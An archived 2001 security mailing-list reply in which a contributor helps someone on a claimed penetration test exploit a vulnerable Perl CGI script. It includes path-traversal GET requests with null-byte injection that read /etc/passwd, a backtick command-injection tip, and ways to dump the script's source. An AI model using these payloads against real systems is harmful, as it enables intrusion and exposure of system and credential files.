Re: vulnerable perl script?

From: Jay D. Dyson (jdysonat_private)
Date: Thu Oct 18 2001 - 11:22:17 PDT

Next message: GrandmastrPlagueat_private: "Fwd: Reverse Http Shell Solution"

Previous message: otanerat_private: "Re:vulnerable perl script"
In reply to: otanerat_private: "vulnerable perl script?"
Next in thread: Ryan Permeh: "Re: vulnerable perl script?"
Reply: Ryan Permeh: "Re: vulnerable perl script?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 18 Oct 2001 otanerat_private wrote:

> I'm doing a pen test and I found a perl script, which seems to be
> vulnerable. If I do a get, for example: 
> 
> GET
> /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../etc/passwd%00
> 
> I can see the content of the passwd file. But when I try to execute a
> command, for example:
> 
> GET
> /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../bin/id%00
> 
> I get this garbage and some interesting stuff:

	It's not executing the command; the binary itself is being dumped
(just like if you did a 'cat /bin/id' on the command line).

	Try encapsulating the last part as `/bin/id`.  That should get you
the desired results. 

> I'm not sure but I think, the %00 is the problem and without %00, I get
> no results. Does anybody know how I can execute my commands? I tried ;
> and Ś, but nothing happened. I'm not able to see the source of the perl
> file. 

	To see the contents of the PERL file, try something like:

	/cgi-bin/whatever.pl?variable1=test%00&variable2=./whatever.pl%00

	If that doesn't work, try standard Apache locations like:

	/var/lib/apache/cgi-bin/whatever.pl
	/usr/local/apache/cgi-bin/whatever.pl
	/usr/local/bin/apache/cgi-bin/whatever.pl

	...and so on.  If none of that pans out, just try passing a find
or locate command through variable2.  You're bound to hit paydirt
thataway.

- -Jay

  (    (                                                         _______
  ))   ))   .-"There's always time for a good cup of coffee."-.   >====<--.
C|~~|C|~~| (>------ Jay D. Dyson - jdysonat_private ------<) |    = |-'
 `--' `--'  `- Peace without justice is life without living. -'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBO88PzblDRyqRQ2a9AQH/awQAnlHQFzWyN6NvutvxihGEBFCwynuTskTY
prW19RtauFxgYarxTfDpbFi8zKcX3k9b+OjLXADDZDFUFXDA1ege9UWBCFDBwtl1
rn95LtTPvzyXCnskeKMeKCAXQZlfJyLeUySvURVxVegbuDJxSmCsDA4UfeE3eDjJ
Q4JLIbCe0Zw=
=LJcu
-----END PGP SIGNATURE-----


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: GrandmastrPlagueat_private: "Fwd: Reverse Http Shell Solution"
Previous message: otanerat_private: "Re:vulnerable perl script"
In reply to: otanerat_private: "vulnerable perl script?"
Next in thread: Ryan Permeh: "Re: vulnerable perl script?"
Reply: Ryan Permeh: "Re: vulnerable perl script?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Oct 18 2001 - 12:53:27 PDT